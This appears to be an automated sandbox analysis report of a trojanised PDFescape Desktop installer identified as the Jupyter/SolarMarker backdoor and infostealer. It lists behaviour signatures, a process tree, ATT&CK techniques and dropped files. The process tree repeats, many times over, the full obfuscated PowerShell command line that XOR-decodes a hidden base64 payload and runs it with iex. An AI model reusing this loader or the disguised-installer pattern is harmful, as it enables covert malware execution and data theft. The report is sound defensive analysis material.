Resubmissions

08-06-2021 18:11

210608-f4tsl5dzma 10

Analysis

  • max time kernel
    1799s
  • max time network
    1803s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    08-06-2021 18:11

General

  • Target

    8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe

  • Size

    107.7MB

  • MD5

    e4b18058271e4c9bfc7e3759a6132437

  • SHA1

    70248c40ca94932a7f098a26ee7858bda5903d73

  • SHA256

    8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1

  • SHA512

    4bf709dc7e3e32d7a694732b60150ea97b834465a8074d6b3d4acab0633d3e6f2a96d211f04c58397032bf60e8b4e172c775c95b3afe8765f8e2f1b650c6a045

Malware Config

Signatures

  • Jupyter, SolarMarker

    Jupyter is a backdoor and infostealer first seen in mid 2020.

  • Registers COM server for autorun 1 TTPs
  • Blocklisted process makes network request 20 IoCs
  • Executes dropped EXE 11 IoCs
  • Registers new Print Monitor 2 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 10 IoCs
  • Loads dropped DLL 64 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 24 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Installs/modifies Browser Helper Object 2 TTPs

    BHOs are DLL modules which act as plugins for Internet Explorer.

  • Drops file in System32 directory 11 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 64 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
  • Modifies data under HKEY_USERS 52 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 5 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious use of SendNotifyMessage 2 IoCs
  • Suspicious use of SetWindowsHookEx 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe
    "C:\Users\Admin\AppData\Local\Temp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Users\Admin\AppData\Local\Temp\is-6J7C8.tmp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-6J7C8.tmp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.tmp" /SL5="$70050,111934780,999424,C:\Users\Admin\AppData\Local\Temp\8a5414b7aac54f93ddaa9e57538378db7d68fd6e457770206eef46cd9371aeb1.exe"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:1840
      • C:\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\PDFescape_Desktop_Installer.exe
        "C:\Users\Admin\AppData\Local\Temp\is-TVUP7.tmp\PDFescape_Desktop_Installer.exe"
        3⤵
        • Executes dropped EXE
        • Checks computer location settings
        • Loads dropped DLL
        • Modifies system certificate store
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SendNotifyMessage
        • Suspicious use of WriteProcessMemory
        PID:3564
        • C:\Windows\SysWOW64\regsvr32.exe
          regsvr32.exe /s "C:\ProgramData\PDFescape Desktop\Installation\Statistics.dll"
          4⤵
          • Loads dropped DLL
          • Modifies registry class
          PID:2104
        • C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe
          "C:\ProgramData\PDFescape Desktop\Installation\PDFescapeDesktopInstaller.exe" /RegServer
          4⤵
          • Executes dropped EXE
          PID:3808
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3948
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2744
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:3992
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4132
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4172
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4256
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4332
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4400
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$0bec96e87f52c8a2856019a2b7d00804='C:\Users\Admin\dacfcb95e57321c49f503f1e6b2931e4\0c1153c321bd7a0668399c45e67df25d\a1c43705bdd820373b8bb869c69eaaf2\fd12c57ed478eba323133c228661c1b2\4e1477e12d0fa985ee704dcbc9bb365f\1cc8b9eea63944a245f5c79f30805cec\2a77d61851d690bbe9ff1db2a22f618b';$57b6288e0d9d5c2e82772ed182bcdbdf='oPJROKHhaUCFMfeWdVpDQBZAigtmxkNnvjbzsLrcEuYTGXIwlyqS';$4e42becc944e178fd3e111f92362c329=[System.Convert]::FromBase64String([System.IO.File]::ReadAllText($0bec96e87f52c8a2856019a2b7d00804));remove-item $0bec96e87f52c8a2856019a2b7d00804;for($i=0;$i -lt $4e42becc944e178fd3e111f92362c329.count;){for($j=0;$j -lt $57b6288e0d9d5c2e82772ed182bcdbdf.length;$j++){$4e42becc944e178fd3e111f92362c329[$i]=$4e42becc944e178fd3e111f92362c329[$i] -bxor $57b6288e0d9d5c2e82772ed182bcdbdf[$j];$i++;if($i -ge $4e42becc944e178fd3e111f92362c329.count){$j=$57b6288e0d9d5c2e82772ed182bcdbdf.length}}};$4e42becc944e178fd3e111f92362c329=[System.Text.Encoding]::UTF8.GetString($4e42becc944e178fd3e111f92362c329);iex $4e42becc944e178fd3e111f92362c329;"
        3⤵
        • Blocklisted process makes network request
        • Drops startup file
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4476
  • C:\Windows\SysWOW64\DllHost.exe
    C:\Windows\SysWOW64\DllHost.exe /Processid:{2BC47158-F746-4E22-B116-D481B09E9674}
    1⤵
    • Loads dropped DLL
    PID:400
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Enumerates connected drives
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1832
    • C:\Windows\system32\srtasks.exe
      C:\Windows\system32\srtasks.exe ExecuteScopeRestorePoint /WaitForRestorePoint:2
      2⤵
        PID:18156
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\preview-handler.dll"
        2⤵
        • Loads dropped DLL
        • Modifies registry class
        PID:10120
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\thumbnail-handler.dll"
        2⤵
        • Loads dropped DLL
        PID:7700
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\context-menu.dll"
        2⤵
        • Loads dropped DLL
        PID:10824
      • C:\Windows\syswow64\MsiExec.exe
        "C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll"
        2⤵
        • Loads dropped DLL
        • Modifies Internet Explorer settings
        • Modifies registry class
        PID:13416
      • C:\Program Files\PDFescape Desktop\ws.exe
        "C:\Program Files\PDFescape Desktop\ws.exe" -service
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies registry class
        PID:16564
      • C:\Windows\System32\MsiExec.exe
        C:\Windows\System32\MsiExec.exe -Embedding 9E8863CFD48A74FEE4783E820437DD15 E Global\MSI0000
        2⤵
        • Loads dropped DLL
        PID:8076
      • C:\Program Files\PDFescape Desktop\updater-ws.exe
        "C:\Program Files\PDFescape Desktop\updater-ws.exe" -service
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies registry class
        PID:11140
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"
        2⤵
        • Loads dropped DLL
        PID:19072
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"
        2⤵
        • Loads dropped DLL
        • Modifies Internet Explorer settings
        • Modifies registry class
        PID:11876
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-word-plugin.dll"
        2⤵
        • Loads dropped DLL
        • Modifies registry class
        PID:14080
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-excel-plugin.dll"
        2⤵
        • Loads dropped DLL
        • Modifies registry class
        PID:17588
      • C:\Windows\System32\MsiExec.exe
        "C:\Windows\System32\MsiExec.exe" /Y "C:\Program Files\PDFescape Desktop\creator\plugins\OfficeAddin\creator-powerpoint-plugin.dll"
        2⤵
        • Loads dropped DLL
        • Modifies registry class
        PID:2792
      • C:\Windows\syswow64\MsiExec.exe
        "C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-helper.dll"
        2⤵
        • Loads dropped DLL
        PID:7012
      • C:\Windows\syswow64\MsiExec.exe
        "C:\Windows\syswow64\MsiExec.exe" /Y "C:\Program Files (x86)\PDFescape Desktop\creator\plugins\IEAddin\creator-ie-plugin.dll"
        2⤵
        • Loads dropped DLL
        • Modifies Internet Explorer settings
        PID:12332
      • C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe
        "C:\Program Files\PDFescape Desktop\creator\common\printer-installer-app.exe" -i "C:\Program Files\PDFescape Desktop\creator\common"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Drops file in System32 directory
        • Modifies data under HKEY_USERS
        PID:13076
      • C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe
        "C:\Program Files\PDFescape Desktop\creator\common\creator-app.exe" -regserver
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        PID:8596
      • C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe
        "C:\Program Files\PDFescape Desktop\creator\common\creator-ws.exe" -service
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Modifies registry class
        PID:10820
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:5028
    • \??\c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
      1⤵
      • Checks SCSI registry key(s)
      • Modifies data under HKEY_USERS
      PID:14736
    • C:\Windows\System32\spoolsv.exe
      C:\Windows\System32\spoolsv.exe
      1⤵
      • Loads dropped DLL
      • Drops file in System32 directory
      • Checks SCSI registry key(s)
      • Modifies data under HKEY_USERS
      PID:13476
    • C:\Program Files\PDFescape Desktop\escape.exe
      "C:\Program Files\PDFescape Desktop\escape.exe"
      1⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Suspicious behavior: AddClipboardFormatListener
      PID:11444
    • C:\Program Files\PDFescape Desktop\ws.exe
      "C:\Program Files\PDFescape Desktop\ws.exe"
      1⤵
      • Executes dropped EXE
      PID:4856
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      PID:13580
    • C:\Windows\system32\browser_broker.exe
      C:\Windows\system32\browser_broker.exe -Embedding
      1⤵
      • Modifies Internet Explorer settings
      PID:14668
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of SetWindowsHookEx
      PID:10116
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
      • Modifies Internet Explorer settings
      • Modifies registry class
      PID:17224
    • C:\Program Files\PDFescape Desktop\updater-ws.exe
      "C:\Program Files\PDFescape Desktop\updater-ws.exe"
      1⤵
      • Executes dropped EXE
      • Modifies data under HKEY_USERS
      PID:16656
    • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
      "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
      1⤵
        PID:12140
      • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
        "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
        1⤵
          PID:20788
        • C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
          "C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
          1⤵
          • Modifies registry class
          PID:20064

        Network

        MITRE ATT&CK Matrix ATT&CK v6

        • Persistence
          • Registry Run Keys / Startup Folder: 2, T1060
          • Browser Extensions: 1, T1176
        • Defense Evasion
          • Modify Registry: 4, T1112
          • Install Root Certificate: 1, T1130
        • Discovery
          • Query Registry: 4, T1012
          • System Information Discovery: 4, T1082
          • Peripheral Device Discovery: 2, T1120

        Downloads

        • C:\Program Files (x86)\PDFescape Desktop\pdfactivedoc.dll
        • C:\Program Files\PDFescape Desktop\atom.dll
        • C:\Program Files\PDFescape Desktop\brand.dll
